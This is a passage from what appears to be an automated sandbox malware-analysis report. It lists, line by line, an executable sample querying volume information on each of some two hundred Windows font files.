                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
